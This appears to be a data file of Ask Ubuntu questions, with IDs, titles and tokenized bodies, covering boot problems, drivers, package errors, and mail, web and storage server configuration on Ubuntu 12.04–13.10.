in.archive.ubuntu.com_ubuntu_dists_saucy-updates_universe_source_sources -rw-r -- -- - 1 root root 0 dec 13 18:41 lock drwxr-xr-x 2 root root 4096 dec 13 18:42 partial -rw-r -- r -- 1 root root 15267 dec 11 18:17 ppa.launchpad.net_webupd8team_java_ubuntu_dists_saucy_main_binary-amd64_packages -rw-r -- r -- 1 root root 11882 dec 11 18:17 ppa.launchpad.net_webupd8team_java_ubuntu_dists_saucy_release -rw-r -- r -- 1 root root 316 dec 11 18:17 ppa.launchpad.net_webupd8team_java_ubuntu_dists_saucy_release.gpg -rw-r -- r -- 1 root root 296000 dec 13 18:05 /var/lib/dpkg/ : total 28 drwxr-xr-x 2 root root 4096 dec 13 13:12 alternatives -rw-r -- r -- 1 root root 0 dec 13 13:12 dpkg.status.0 drwxr-xr-x 2 root root 4096 dec 13 13:12 info -rw-r -- -- - 1 root root 0 dec 13 14:35 lock drwxr-xr-x 2 root root 4096 dec 13 13:12 methods drwxr-xr-x 2 root root 4096 dec 13 13:12 parts drwxr-xr-x 2 root root 4096 dec 13 13:50 status drwxr-xr-x 2 root root 4096 dec 13 13:12 triggers drwxr-xr-x 2 root root 4096 dec 13 13:12 updates
390216	wrong cursor directions and brackets in right to left languages	i successfully write in arabic . but there 's a problem with symbols like brackets ( ) , < > , and full stops . they are displayed in wrong directions in case of brackets and in wrong place in case of full stop ( at the beginning of the line instead the end ) and the another wired problem : when you press the right arrow the cursor moves to left , and when u press left , cursor moves right . sorry , with all my respect to ubuntu programmers , how you can not solve this silly problem !
390219	ssh can not find user directory and fails to login	the connection to ssh seems to work but i get an error and ssh gets closed instantly : it tells me , that it cant chdir to /home/example1 not found the problem is , that example1 is n't even a user and even if i create that folder it says it ca n't find it . this is pretty annoying as i ca n't find a way to fix it . why does ssh want to use a home directory which is n't even there ? i 'm logged in as example2 .
390224	i am new to ubuntu so just a bit of queries before i install it over my windows	how would i setup internet connection in saucy salamander and how can i get apps using the sudo apt comands and yeah tell me some basic commands for like troubleshooting problems related to memory and hdd etc . waiting for your reply i use a internet service provider who has just used the command ncpa.cpl to go to the device in windows and configured its ipv4 properties to let me use internet via their website 180.188.246.5 so could u just tell me to configure and setup internet on ubuntu .
390225	ubuntu os security	my friend suggest me ubuntu os instead of windows 7 because on ubunut no virus , trojan , rootkit this is true ? thanks , michi
390226	stc alcatel x080s modem not working in ubuntu 13.10	i am really blank , do n't know what to do . i 'm connecting the modem but it 's not getting detected . what is the way to get it work ?
390228	how to install windows 7 as it already has ubuntu 12.04	i m getting a prob . to install windows 7 on ubuntu 12.04 whem i am staring the installation from a pen drive it shows the error 0x800700a on it how to get rid of it
390229	system drivers ( third party )	i have a nvidia graphics card and the driver that the system found works okay . i would like to download something better . how hard is it to find and install them ?
390234	virtual box failed at starting because of vboxdrv in 13.10	after upgrading to the latest version of virtual box , it show the message below when i starting a virtual machine run /etc/init.d/vboxdrv setup stopping virtualbox kernel modules ... done . uninstalling old virtualbox dkms kernel modules ... done . trying to register the virtualbox kernel modules using dkmserror ! your kernel headers for kernel 3.8.0-31-generic can not be found . please install the linux-headers-3.8.0-31-generic package , or use the -- kernelsourcedir option to tell dkms where it 's located ... failed ! ( failed , trying without dkms ) recompiling virtualbox kernel modules ... failed ! ( look at /var/log/vbox-install.log to find out what went wrong ) /var/log/vbox-install.log uninstalling modules from dkms removing old dkms module vboxhost version 4.3.4 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- deleting module version : 4.3.4 completely from the dkms tree . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- done . attempting to install using dkms creating symlink /var/lib/dkms/vboxhost/4.3.4/source - > /usr/src/vboxhost-4.3.4 dkms : add completed . failed to install using dkms , attempting to install without makefile:183 : *** error : unable to find the sources of your current linux kernel . specify kern_dir= < directory > and run make again . stop . run sudo apt-get install linux-headers-3.8.0-31-generic reading package lists ... done building dependency tree reading state information ... done package linux-headers-3.8.0-31-generic is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'linux-headers-3.8.0-31-generic ' has no installation candidate any help is appreciated !
390236	\updating 11 to 12 with update manager - no progress ?	i 've just run the update manager on ubuntu 11 to upgrade to 12 . i was watching the 'terminal ' output in the manager , with thunderbird open in the background , when everything was hidden by my desktop backiground image . or that is how it seems - every now and again i see the apps open , and then the bg covers them again . mouse is responding , no keyboard button seems to take effect ( have not pressed esc ) . i 've left it for an hour or so -- - is this normal ? it 's not a brand new machine , and although i do n't know the specs , it is not terribly slow usually . any suggestions would be appreciated ! this was 11 - 11.4 , i think but i may be wrong - to 12 - 12.4 i thought , but i may be wrong . in any case , i am using the update manager to perform the task : this is my first time , and it 's not my machine , so i thought i 'd try the simplest thing that would keep as much intact as possible .
390245	flash animations are horizontally crunched and colors are bogus	on a fresh install , i can not read flash animations properly . i tried enabling hwaccel and gpuoverride using mms.cfg which did n't change anything . video playback in vlc is ok. my graphics chip : intel corporation 82845g/gl [ brookdale-g ] /ge chipset integrated graphics device ( rev 01 ) this is how it is looks like : any ideas ?
390253	missing asm/types.h file	i have been trying to compile a very old program actual meant for kernel i previously had an issue missing modversions.h which is solved now , but there is another issue . in file included from /lib/modules/3.8.0-29-generic/build/include/linux/types.h:5:0 , from /lib/modules/3.8.0-29-generic/build/include/linux/list.h:4 , from /lib/modules/3.8.0-29-generic/build/include/linux/module.h:9 , from kaodv-mod.c:30 : /lib/modules/3.8.0-29-generic/build/include/uapi/linux/types.h:4:23 : fatal error : asm/types.h : no such file or directory compilation terminated . make [ 1 ] : *** [ kaodv-mod.o ] error 1 make [ 1 ] : leaving directory `/home/vm1/aodv-12-12-13/lnx' make : *** [ kaodv ] error 2 the file /lib/modules/3.8.0-29-generic/build/include/uapi/linux/types.h is a linux header file , i don`t understand how such an error could occur . other informations os : ubuntu 12.04 kernel version : 3.8.0-29 program i`m trying to compile : [ aodv-uu ] [ 2 ] please help me fix it .
390269	how do i change the default sound card ?	i have an usb card , but the default card must be the onboard audio , i can change the default card in pulseaudio card , but i ca n't hear anything in half life 2 , because the usb card is not the primary card . $ aplay -l **** lista de playback dispositivos hardware **** tarjeta 0 : nvidia [ hda nvidia ] , dispositivo 0 : alc662 rev1 analog [ alc662 rev1 analog ] subdispositivos : 1/1 subdispositivo # 0 : subdevice # 0 tarjeta 0 : nvidia [ hda nvidia ] , dispositivo 3 : hdmi 0 [ hdmi 0 ] subdispositivos : 1/1 subdispositivo # 0 : subdevice # 0 tarjeta 2 : headset [ hp digital stereo headset ] , dispositivo 0 : usb audio [ usb audio ] subdispositivos : 0/1 subdispositivo # 0 : subdevice # 0 tarjeta 3 : generic [ hd-audio generic ] , dispositivo 3 : hdmi 0 [ hdmi 0 ] subdispositivos : 1/1 subdispositivo # 0 : subdevice # 0
390270	awesome-wm detect and launch application on workspaces on multiple monitors	is it possible in awesome-wm to 1 ) detect on which workspace ( tag ) +monitor is an application running wmctrl -l shows only the workspace number regardless of which monitor 2 ) open an application in a specific monitor+workspace e.g . 3 monitors , each have 9 tags in awesomewm i wish to e.g . open firefox browser on monitor 2 , tag 3 using wmctrl i can only redirect to tag 3 of the active monitor only , so a script to move the windows to different tags would be able to move them only on tag 3 of the active monitor if i specify the size and position of the windows to move in wmctrl , e.g . 0x0 is the upper left corner of monitor 1 ( left ) , it can move windows to the other monitors , but only in the active tag , e.g . by default tag 1 . wmctrl output example : $ wmctrl -d 0 * dg : 1920x1080 vp : n/a wa : n/a 1 1 - dg : 1920x1080 vp : n/a wa : n/a 2 2 - dg : 1920x1080 vp : n/a wa : n/a 3 3 - dg : 1920x1080 vp : n/a wa : n/a 4 4 - dg : 1920x1080 vp : n/a wa : n/a 5 5 - dg : 1920x1080 vp : n/a wa : n/a 6 6 - dg : 1920x1080 vp : n/a wa : n/a 7 7 - dg : 1920x1080 vp : n/a wa : n/a 8 8 - dg : 1920x1080 vp : n/a wa : n/a 9 $ wmctrl -lgp 0x0400008a 0 676 5748 40 963 1057 home awesome-wm detect and launch application on workspaces on multiple monitors - ask ubuntu - mozilla firefox 0x03800002 1 31199 7682 40 956 1057 home vlc media player 0x02e00003 0 16180 9602 40 956 1057 home rhythmbox 0x02c0008a 0 16065 2 40 1916 1057 home restore session - mozilla firefox
390281	how to make hotkeys alt_l+x and alt_r+y different in kde ?	in kde settings pressing left and right modifier keys have no difference , for example , alt+x works both with left and right alt keys . is it possible to make them different ? using xev you can see that these keys produce different events , so it 's the kde question .
390287	remote x window : how to set up both client and server	update : i have now learned to use `` ssh -y uname @ ip xterm '' to start the session . i had to `` sudo chown uname : uname ~uname/.xauthority '' in order to let x window to start . xterm and gedit seem to work okay . any other application is extremely sluggish to the point of being unusable over 100base-t connection . any suggestions ? original post : i have two ubuntu machines , a desktop running 13.10 and a laptop currently running 12.04 . i would like to use the laptop to connect to the desktop with a remote session . i can not find instructions for separately setting up the server and client . i get confused in most discussions about which machine needs to be configured . i have tried various incantations of ssh -x and ssh -y but have not successfully started the unity session remotely on my desktop . i have succeeded in killing the local sessions on both machines . part of the confusion is that i never seem to find the configuration files that others suggest modifying and the utilities to modify the system seem to be different in each of the suggestions . thanks .
390290	reliance netconnect+ in ubuntu	i have a huwaei reliance netconnect+ modem.. to use it with ubuntu i need to first boot into windows use it for a while and then restart and go to ubuntu..else its not detected as a modem or a usb drive in linux ... i have tried almost every method using wvdial configuration.. any solution to this ? do my uefi settings make a difference ?
390294	usb drive not recognized	i put a usb drive into my computer and was not recognized . can someone help me ? the computer says it was not possible to mount the usb drive .
390296	ca n't add or remove any program after a package for ubuntu-nokia-suite broke	whenever i try apt-get install it shows the following : apt-get install -f reading package lists ... done building dependency tree reading state information ... done e : the package nokuntusp needs to be reinstalled , but i ca n't find an archive for it .
390305	after trying ubuntu 12.04 cd windows xp computer will no longer boot	yesterday i tried the ubuntu 12.04 cd . ubuntu seemed to work ok , but after the cd was taken out of the disk drive , the computer wo n't work at all . what happens is that i turn it on and it immediately turns off . sometimes i see the initial screen and try to press the function button to do a system restore , but it never works . i could really use some help with this , so if anyone has any ideas as to what the problem is , i would really appreciate hearing from them . thanks .
390309	laptop acer 4520 wont shutdown restarts instead	am running ubuntu 12.04 lts , tried to reinstall the os , fix the boot , and following the instructions in the forum but still cant shutdown . i got this when i was trying to fix the boot , any help is really appreciated : http : //paste.ubuntu.com/6567308/
390310	how do i remove the fglrx driver error ?	every time i log in to my computer system error message is shown . it is something to do with fglrx driver for ati graphics card that its installation could n't be completed . i am really annoyed with that driver and have no intention on fixing it as long as my computer runs smoothly . is there a way to `` do n't show this again i am irresponsible and really do n't care '' ?
390311	nginx rendering php as plain text	server { listen 80 ; server_name test.local ; access_log /var/log/nginx/access.log ; error_log /var/log/nginx/error.log ; root /var/www/testsite ; location ~ \.php $ { fastcgi_split_path_info ^ ( .+\.php ) ( /.+ ) $ ; fastcgi_pass unix : /var/run/php5-fpm.sock ; include /etc/nginx/fastcgi_params ; } } requests to php files just return the code as plain text . headers do mention php , so i presume nginx is talking to php properly .. i 've looked over it all too many times now , i feel i must be staring right at the problem . can anyone help ?
390315	ubuntu 12.10 : package manager is broken ( i think )	please note : i 'm a newbie with ubuntu , only just beginning to get a grasp on terminal , etc . whenever i try to install anything using terminal , with sudo apt-get install vlc it works fine untill i have confirmed additional disk space will be used . after it has fetched all the necessary files and unpacked them , i get a long list starting with dpkg : error processing [ ... ] and it ends with processing was halted because there wee : sub-process /usr/bin/dpkg returned an errorcode ( 1 ) i already googled for a solution quite a bit but ca n't find anyone with the exact same issue . also , i do n't know if it has anything to do with it , but i tried to get some additional plugins for an application i installed through software center and it gave me an error message saying '' an unhandlable error occured : there seems to be a programming error in aptdaemon , the software that allows you to install/remove software and to perform other package management related tasks . '' thanks in advance . edit : here 's the full error log : http : //pastebin.com/9yjsrf4a
390316	i 'd like to open gedit files in a web browser like firefox	i 'm a drupal/wordpress developer , and i use ubuntu for editing php , html , javascript and css files . i typically work with a local xampp stack with staging copies of my production environments . i 'd really like to be able to open a file i 'm working on in a web browser . obviously i can open the browser and visit the localhost/whatever url , but i 'm hoping there might be some sort of nifty right-click type solution . anyone know of anything . or do i have to dust off the old c skills and try to programme a plugin myself ? thanks for your help . j
390319	mounting iphone 4	i tried to mount an iphone 4 on ubuntu 13.10 . after plugging in i 'll get an `` the device [ name ] is locked . enter the password and click on 'try again ' `` ( in german ) the iphone prompts 'trust this computer ' , but when trusting the computer the iphone asks again and again ( for trusting the pc ) . how can i mount the iphone 4 ? what am i doing wrong ?
390323	ubuntu refuses to boot , gives a flashing underscore	yesterday ubuntu prompted me to download and install updates . after it finished with the updates , i rebooted the machine . now i ca n't get past a flashing underscore . boot loader works and i do n't get greeted by grub rescue ... just a flashing underscore . any ideas how to fix this ?
390324	how disabling scroll lock when switching layouts ?	i updated my xubuntu 12.04 xfce 4.8 to xfce 4.10 and now when i switching keyboard layouts activated scroll lock . how to disable scroll lock when i switched layout ? because the scroll lock switches profiles in my mouse . p.s . sorry for my english .
390329	weather from terminal	i want to find the current weather of a particular city or my location from terminal.is there any command-line weather app ?
390331	gadmin-proftpd stays into deactivated	after gadmin-proftpd installation and two users configuration , when i try to activate the service from the button present into ui , the server status stays deactivated . what could i check to solve the problem . thank you maurizio
390332	is it possible to upgrade windows without affecting ubuntu ?	i have ubuntu 13.10 and windows 7 installed on my computer . even if most of the time i use ubuntu , i would like to upgrade win7 to win8.1 ( as student i have it free ) . i 'm wondering if the installation of windows does not work without touching the dual boot or the ubuntu partition or ubuntu configuration . can i go on without be worry ?
390336	can not unlock applications from the launcher	i upgraded to 13.10 and i can not unlock anything from the launcher . if i opposite mouse on the application and select `` unlock from launcher '' nothing happens . the only way to remove them is to uninstall the program which is pointless . i also tried doing what others have tried by clearing the cache for `` zeitgeist '' but i dont have the file they are mentioning .
390337	how do i configure two ip addresses on a specific vlan	i 'm not sure about the syntax here : what comes first in /etc/network/interfaces interface names , vlan or alias ? what i want is to setup two different subnets on the same vlan ( temporarily ) . it will look something like below , where there 's a 10.20.100.100/24 and 10.20.200.200/24 on the same vlan ( id 33 ) : iface eth0:1.33 inet static address 10.20.100.100 netmask 255.255.255.0 iface eth0:2.33 inet static address 10.20.200.200 netmask 255.255.255.0 i expected the debian wiki to answer this but it did not : https : //wiki.debian.org/networkconfiguration # multiple_ip_addresses_on_one_interface
390339	how to use libreoffice impress arrows	dumb question alert ! i ca n't figure out how to make an arrow in libreoffice impress . i 'm aware of the standard documentation and i found the drop-down arrow item on the toolbar , but just can get it to do anything for me . i click on an arrow and try to drag it out of the drop down , and nothing happens . what is the mechanical click-drag sequence that is supposed to make this work ?
390341	black screen appears when i select ubuntu at the boot screen	i tried to install ubuntu 12.10 but the installation did n't complete . it got stuck at the last moment and my pc restarted after that . now it shows four options . advance menu for ubuntu , ubuntu and two others for memory test . when i try to start ubuntu , nothing happens . there only appears a black screen where i can type in to .
390342	can fdisk from ubuntu 11.04 be used to fix a 12.04 disk	can fdisk from a previous version of ubuntu be used to repair a disk that has 12.04 on it ? i am in a situation where i can not boot from 12.04 ( not via usb , cd is too small and dvd wont boot ) so i am stuck .
390344	iscsiadm discovery gives multiple paths . want to specify one	i 've using iscsi to connect a server to a san . the san has multiple ethernet nics . when i do an iscsi discovery ... iscsiadm -m discovery -t st -p 172.16.0.1 ... we get the a listed path for each available nic : $ : /etc/iscsi > sudo iscsiadm -m discovery -t st -p 172.16.0.1 172.16.0.1:3260,0 iqn.2000-01.com.store 169.254.219.124:3260,0 iqn.2000-01.com.store 10.0.255.82:3260,0 iqn.2000-01.com.store 172.16.0.1:3260,0 iqn.2000-01.com.name 169.254.219.124:3260,0 iqn.2000-01.com.name 10.0.255.82:3260,0 iqn.2000-01.com.name what i 'd like to do is set up the initiator to do 2 things automatically on bootup : connect the target from a specific interface , namely 172.16.0.1 only connect a specific target , namely iqn.2000-01.com.store i want the iscsi initiator to start automatically , and while this is working it only connects to the 10.0.0.0 network automatically . this is n't desirable as that 's where the rest of the traffic is running whereas 172.16.0.0 network is dedicated to the iscsi link . having said that , i can manually initiate the link to the iscsi target using : sudo iscsiadm -m node -- targetname `` iqn.2000-01.com.store '' -- portal `` 172.16.0.1:3260,0 '' -- login this works fine , but again , needs this to be automatic . please let me know if there 's a way to handle this . thanks ! ! ( please note that i 've obfuscated the target name for privacy )
390348	computer completely locked trying to install ubuntu	after trying to install abuntu side by side with windows xp . i now have a completely dead computer , all i get is : '' error : no such device : then a string of numbers '' ending with : grub rescue _ keyboard is locked . i thought all had installed correctly , abuntu said it was complete and to restart , which i did , to no avail . i have tried to reinstall abuntu over original . i have tried logging in to try abuntu procedes . then i just get a screen with jagged diagonal patterns and everything is locked . something is seriously wrong and i ca n't boot into either windows xp or abuntu . have downloaded abuntu boot repair disk , that has done nothing . how to solve this ?
390351	using gparted to rescue data and format hard drive to ntfs	i 'm having problems booting to windows xp due to bad sectors on the hard drive . i 've tried fixboot and fixmbr from the recovery console . that only made matters worse . now i want to use gparted to attempt data rescue and format the hard drive to ntfs . unfortunately , i get an error ( picture 2 ) when trying to recover my files , and the option to format the hard drive is grayed out . the only thing i can do is create a new partition . when i click `` view '' i get the `` unable to open the default file manager '' error
390353	intermittent error with cp to an nfs share	i 've got a script running on a number of ubuntu server 12.04 computers that are all mounted to a single nfs share . when the script completes , it copies the output to the share . most of the time it works fine , but occasionally it will just create an empty file ( of the correct name ) that has no permissions and has a modified date of 1971 , and then it will return an error cp : can not create regular file ' < filename > ' : file exists . this is driving me insane ! here 's my /etc/exports file : /export 192.168.0.0/24 ( rw , fsid=0 , insecure , no_subtree_check , async , no_root_squash ) /export/home 192.168.0.0/24 ( rw , nohide , insecure , no_subtree_check , async , no_root_squash ) /export/opt 192.168.0.0/24 ( rw , nohide , insecure , no_subtree_check , async , no_root_squash ) and here 's an example /etc/fstab from one of the client machines : ... 192.168.0.254 : /home /home nfs4 _netdev , auto 0 0 192.168.0.254 : /opt /opt nfs4 _netdev , auto 0 0
390356	trouble running steam games through playonlinux	i have set everything up correct as far as i can tell and steam launches and runs , but when i try to run a game it will say the game is running in the task manager but there is nothing showing on the screen . does anyone know how to fix this ? thanks
390358	setting up windows-like `` play to tv '' on ubuntu	i am wondering what is the easiest way to achieve it on ubuntu . what do i want : -open player -choose to play file on tv -play whole playlist i have 12.04 ubuntu and samsung un 40b7000 .
390360	where to call xrandr before xmonad is running ?	i 'm currently using the default 12.04 precise login screen , and i 'm using xmonad as my window manager . i 'm trying to determine a good place to put an xrandr call before xmonad is loaded , otherwise xmobar seems to not render correctly on the screen . without xmobar , calling xrandr does n't affect xmonad in any negative way . i figured .xsessions might be one place to do this , but i 'm not sure if that file is even taken in consideration by the default ubuntu desktop manager selector , so i could use some advice here .
390364	is it legal to install ubuntu in an imac machine	i am habituated to use ubuntu system . i have an imac and i want to install her ubuntu . is it legal to do it ? thanks in advance .
390365	compiling kernel with yaffs2 , error ubutnu/aufs/magic.mk no such file or directory	i am following steps to compile the kernel , i have made changes using make menuconfig but i get this error about ubutnu/aufs/magic.mk no such file or directory i tried running make-kpkg clean ( which gives this error ) as root too , but still the problem persists . someone said its because of mrproper which is called internally , it cleans the tree and hence this problem arises . nonetheless i did not find any working solution to this problem .
390367	using different wallpapers on multiple monitors ( gnome 2 + compiz )	this seems like a simple question , yet i could not find any satisfying answer using google or ask ubuntu . so i have a triple-monitor setup . basically what i want is simply to have a different background on each of the three monitors . now i am not speaking about different virtual desktops ( aka workspaces ) here . most of the solutions i googled were about different backgrounds on different workspaces . i have only the one workspace , but three monitors , like so : monitor 1 ( on top ) is my big tv that 's attached to the wall above my two normal monitors . i am using gnome 2 with compiz ( aka gnome-session-fallback aka gnome classic ( with effects ) in the login manager dropdown list ) on ubuntu 13.04 . i tried the following methods trying to set a different background for each monitor : ccsm ( compiz-config-settings-manager ) , that is , setting a background via the window manager ( compiz ) . more precisely , i used the wallpaper plugin of compiz . gnome-control-center , that is , setting a background via the gnome system settings . more precisely , i used the background panel in the gnome system settings . xdg_current_desktop=unity gnome-control-center , that is , settting a background via the gnome system settings , but mimicking unity behavior . more precisely , i used the appearance panel in the gnome system settings . however , none of these methods seem to enable me to select a different background for each monitor . in each case , i can only set a single background ( or possibly several that can then be cycled periodically , or used for different workspaces ) for all three monitors . then , i typically have options like center , tile , crop or scale that control how this single background is rendered across the three monitors . the workaround i have gone with so far is to use gimp to create one `` big '' background that encompasses the entire virtual resolution of all three monitors together . basically , i create one big background image of size 3840x2160 , in which i paste three backgrounds at the right places . then i set this big background as the single background for the three monitors using possibility ( 1 ) or ( 3 ) above , and use the span option to span this big background across all three monitors . this results in three different backgrounds on the three monitors , provided the three smaller backgrounds were placed correctly on the big background image ( note : possibility ( 2 ) does not offer a span option ) . however , this seems like an awful hack to achieve such a simple thing as setting a different background for each of my monitors . it also has several disadvantages : when i want to change the arrangement of the monitors ( the big tv on top can be slided some way to the left or to the right , and i like to adjust the monitor positions accordingly using xrandr or an associated gui such as the displays panel in the gnome system settings , so as to keep mouse movement intuitive ) , clearly the upper background does not slide along with the monitor it 's supposed to be displayed on , which means i only see part of the upper background . the big background has some gray areas ( dead space ) in the upper corners that are uselessly loaded at login time by compiz or gnome when the big background is loaded . worst of all , when i want to change a single one of the three backgrounds , then i have to gimp-edit the whole big background . this is too much work considering i simply want to change a single background ( yep , i know about gimp layers , but still ) - this ought to be possible with a few clicks and without a heavy-weight image manipulation program . the first point means this workaround is not robust . the second means it is not efficient . and the third means it 's a pain in the butt : ) so my question is this : is there some way - using either gnome 2 or compiz - to simply tell the system that i want a different background for each monitor ? this would be the logical approach to me , as it would actually tell the system what my intention is . it would also be more efficient . really , it feels like this can not be such an uncommon scenario . i would think many people have multiple monitors ; and at least some of those must prefer to have different backgrounds on these monitors . so can it be true that there is no straightforward solution , and users are expected to come up with awful hacks such as creating their own custom backgrounds with heavy-weight programs in order to get this to work ?
390377	resizing my /home partition from ubuntu	i currently have ubuntu 13.10 installed , with a separate partition for / and for /home . the question i have is can i resize the /home partition from the ubuntu installation or is it better to boot live usb ?
390378	how do i learn ubuntu commands ?	i want to learn and work with linux- ubuntu os . is any online sources available to learn ubuntu ? note : whenever i am facing some problem in my system , i just search at ask ubuntu and do copy paste whatever expert suggested . i do n't know whats happened what it mean those key word ? could anyone help me to learn asap ? thank you in advance ... .. !
390379	environment variable is not update	i try to set the $ path reference to the current working directory , one machine work as expected , but another machine is not . basically , i have set below line in .bashrc export path= $ pwd/bin : $ path if i move directory to /123 , i expected that the $ path will updated to /123/bin : $ path but it is n't . are there anyway to make it read the current $ pwd to use in $ path ?
390385	dvd-r will not allow me to burn a file like my bios update for example	i recently installed ubuntu live 13.10 its been a fun learning experience . however i am reading all the help files on permissions to determine why i the owner of my own computer that i purchaced with my hard earned money does not allow me to do simple things like write a bios update cd/dvd . i have read help online , ubuntus help . i did everthing that was asked and mentioned and more . i am still unable to own my computer . this is somewhat nerve racking to own something and have it tell you sorry you do n't own me . the question at hand involves burning a dvd .iso of an updated bios version . i 've installed a few programs that indicate they are the supreme comanders of .iso burn technology . i keep getting messages after waiting 20 minutes to burn a few kb 's . these messages are disk drive unmounted . and unable to determine file permissions . i tried to change file permissions with no luck . the file manager will not allow me to resize columns , so that i may see the information presented . i believe this is way to long to spend on a simple problem . im starting to believe i have a gremlin in my ubuntu that is stopping me at or redirecting me down endless dead ends . this may be the problem . how bout any programs that look for gremlins ? is there a help menu that actually looks for what you ask for ? or am i the only one in the universe that types in the search bar only to find a message that no such topic exists ? i find it hard to believe when you have an issue with the dvd-r there is no information upon request that is searchable . some one please help . even if the solution is to toss this fricking computer out the window . i thought i was done with window payne when i came to ubuntu . guess not .
390391	alienware x51 booting issues	after installing ubuntu i was able to do the 1 restart after the install and i can overtime i wipe my drive and reinstall but after im meet with a purple screen ( no ubuntu logo ) then it goes black and says something like `` error on disk '' 3 times then black and makes a ubuntu noise then is just black does n't load in im wondering if theres any way to fix this issue thanks in advance for your help , edit - im using a nvidia graphics card edit - i have looked around on the ask-ubuntu but none of those meathods seem to work
390394	how to hide rox context menu ?	how can i remove context menu on rox ? i 've removed it from desktop , but want to hide it , when you press right mouse click on icons on desktop . thanks .
390395	how do i get my rock candy xbox controller t work on ubuntu	-- [ error ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- no xbox or xbox360 controller found bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 003 device 002 : id 0781:5575 sandisk corp . bus 003 device 003 : id 04ca:0058 lite-on technology corp . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 004 : id 1bcf:2881 sunplus innovation technology inc . bus 002 device 003 : id 0e6f:011f logic3 bus 002 device 004 : id 05e3:0608 genesys logic , inc. usb-2.0 4-port hub bus 002 device 005 : id 8086:0189 intel corp . it does n't seem to recognize my controller ? can someone help me get this to work ? ? xboxdrv wo n't recognize it and it seems even the computer will not .
390396	slow boot , over two minutes	used slackware linux for many years , switched to windows mainly to get data input by voice then returned to linux via ubuntu 12.04 , running on a vanilla acer aspire 9300 portable . all the latest updates have been installed . i thought i knew the slackware command line fairly well but ubuntu 's is a very different kettle of fish . the problem is long duration boot -- 125-129 seconds , much longer than windows-xp , which has even more applications installed . i measure boot time with a stopwatch from appearance of the acer logo to appearance of the ubuntu desktop . is this a typical boot time for ubuntu ? ( i hope not ) dmesg shows the following gaps in the boot process : 2.857023 ] reiserfs ( device sda1 ) : checking transaction log ( sda1 ) 18.972000 ] reiserfs ( device sda1 ) : replayed 603 transactions in 16 seconds 31.469364 ] reiserfs ( device sda1 ) : there were 2 uncompleted unlinks/truncates . completed 80.999460 ] reiserfs ( device sda6 ) : found reiserfs format `` 3.6 '' with standard journal i would guess this means that the machine shuts down every time with disk write operations still outstanding . impatience is admitted . i 've waited as much as five minutes after clicking `` shutdown '' for the ubuntu logo . now during shutdown i simply hold down power-off on the keyboard when it hangs for 30 seconds with a text screen incomprehensible to me : something about `` plymouth '' not terminating properly . sorry , i do n't know how to copy and paste that message . would anyone please suggest a way to avoid leaving `` uncompleted ... transactions '' or in general any way to speed up booting ? thank you for your attention .
390397	is ubuntu 12.04lts comapatible with toshiba l50-a-138	i just bought toshiba l50-a-138 . thing i wont to know is weather ubuntu compatible with it ? will all drivers work fine , especially vga ( cuda and optimus technology ) ? here is the link to specifications .
390398	is there any way to check the clipboard history without external app ?	is there anyway for me to look at the history of the contents of the clipboard ? i had a rather large svn patch , that has unfortunately been wiped due to a careless copy of a url , before pasting the contents of the patch . if i could recover those two hours of work , that would be very very nice . and if not , are there any tools i can install to prevent such heinously stupid errors from occurring again ?
390401	relay access denied error 554	i 'm having trouble setting up a mail server , after following this tutorial i am still unable to send email to anyone outside of my server . i have installed and configured postfix , dovecot , squirrellmail the exact error message i get is : transaction failed 554 5.7.1 email @ example.com : relay access denied there could be an issue with my postfix config file below ( mail_version = 2.9.3 ) # see /usr/share/postfix/main.cf.dist for a commented , more complete version # debian specific : specifying a file name will cause the first # line of that file to be used as the name . the debian default # is /etc/mailname . # myorigin = /etc/mailname smtpd_banner = $ myhostname esmtp $ mail_name ( ubuntu ) biff = no # appending .domain is the mua 's job . append_dot_mydomain = no # uncomment the next line to generate `` delayed mail '' warnings # delay_warning_time = 4h readme_directory = no # tls parameters smtpd_tls_cert_file = /etc/ssl/certs/smtpd.crt smtpd_tls_key_file = /etc/ssl/private/smtpd.key smtpd_use_tls=yes smtpd_tls_session_cache_database = btree : $ { data_directory } /smtpd_scache smtp_tls_session_cache_database = btree : $ { data_directory } /smtp_scache # see /usr/share/doc/postfix/tls_readme.gz in the postfix-doc package for # information on enabling ssl in the smtp client . myhostname = mysite.com mydomain = mysite.com alias_maps = hash : /etc/aliases alias_database = hash : /etc/aliases myorigin = /etc/mailname mydestination = $ myhostname , localhost. $ mydomain , localhost , $ mydomain relayhost = mynetworks = 127.0.0.0/8 , 12.33.444.55 # not the real ip mailbox_size_limit = 0 recipient_delimiter = + inet_interfaces = all inet_protocols = all home_mailbox = maildir/ mailbox_command = smtpd_sasl_local_domain = smtpd_sasl_auth_enable = yes smtpd_sasl_security_options = noanonymous broken_sasl_auth_clients = yes smtpd_recipient_restrictions = permit_sasl_authenticated , permit_mynetworks , reject_unauth_destination smtp_tls_security_level = may smtpd_tls_security_level = may smtpd_tls_auth_only = no smtp_tls_note_starttls_offer = yes smtpd_tls_cafile = /etc/ssl/certs/cacert.pem smtpd_tls_loglevel = 1 smtpd_tls_received_header = yes smtpd_tls_session_cache_timeout = 3600s tls_random_source = dev : /dev/urandom any help would be very appreciated .
390402	making a webapp startup at specific workspace	i want some applications to startup when i login to my ubuntu desktop account . a few of them are webapp shortcuts like tweetdeck that i created from the chrome web browser . i have no idea where it is stored on the hard drive or how it 's called or how to find it , assuming that setting the full program name as command in the startup application window would start it up on login ( like thunderbird launches thunderbird ) . additionally i 'd like each one of those programs to be displayed on a specific workspace ( i use a 3*3 virtual desktop setting ) , like tweetdeck showing on workspace 2 and thunderbird showing on workspace 3 . preferably without the need of installing software , rather a script or extra command .
